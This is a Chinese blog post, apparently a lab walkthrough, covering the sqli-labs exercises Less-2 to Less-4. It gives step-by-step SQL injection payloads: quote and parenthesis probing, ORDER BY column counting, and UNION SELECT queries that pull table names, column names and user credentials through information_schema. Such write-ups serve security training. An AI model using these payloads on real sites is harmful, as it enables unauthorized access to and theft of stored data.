zoukankan      html  css  js  c++  java
  • Less2-Less4

    Less2
    GET_数字型注入

    0x01 判断注入类型

    ?id=1
    
    to use near ' LIMIT 0,1' at line 1
     LIMIT 0,1
    只有一个,没有单双引号,说明为数字型
    后台查询语句
    select username from users where id=1 limit 0,1
    

    0x02 判断显示字段

    ?id=1 order by 4 --+
    报错,有3列
    

    0x03 查询数据库名

    ?id=-1 union select 1,database(),user() --+
    

    0x04 查询表名

    ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+
    

    0x05 查询字段名

    ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+
    

    0x06 查询数据

    ?id=-1 union select 1,2,group_concat(username,password) from users --+
    

    Less-3
    GET_单引号_小括号_字符型注入

    0x01 判断类型

    ?id=1'
    
    use near ''1'') LIMIT 0,1' at line 1
    '1'') LIMIT 0,1
    单引号,单括号
    

    0x02 判断显示字段

    ?id=1') order by 4 --+
    

    Less-4
    GET_双引号_单括号_字符型注入

    0x01 类型判断

    ?id=1"
    
     to use near '"1"") LIMIT 0,1' at line 1
    "1"") LIMIT 0,1
    双引号,单括号
    

    0x02 闭合

    ?id=1") --+
    

  • 相关阅读:
    POJ 2486
    奇怪的电梯
    穿越泥地(mud)
    救援行动(save)
    As Fast As Possible
    Connecting Universities
    They Are Everywhere
    Cells Not Under Attack
    吃饭
    花店橱窗(flower)
  • 原文地址:https://www.cnblogs.com/observering/p/12902465.html
Copyright © 2011-2022 走看看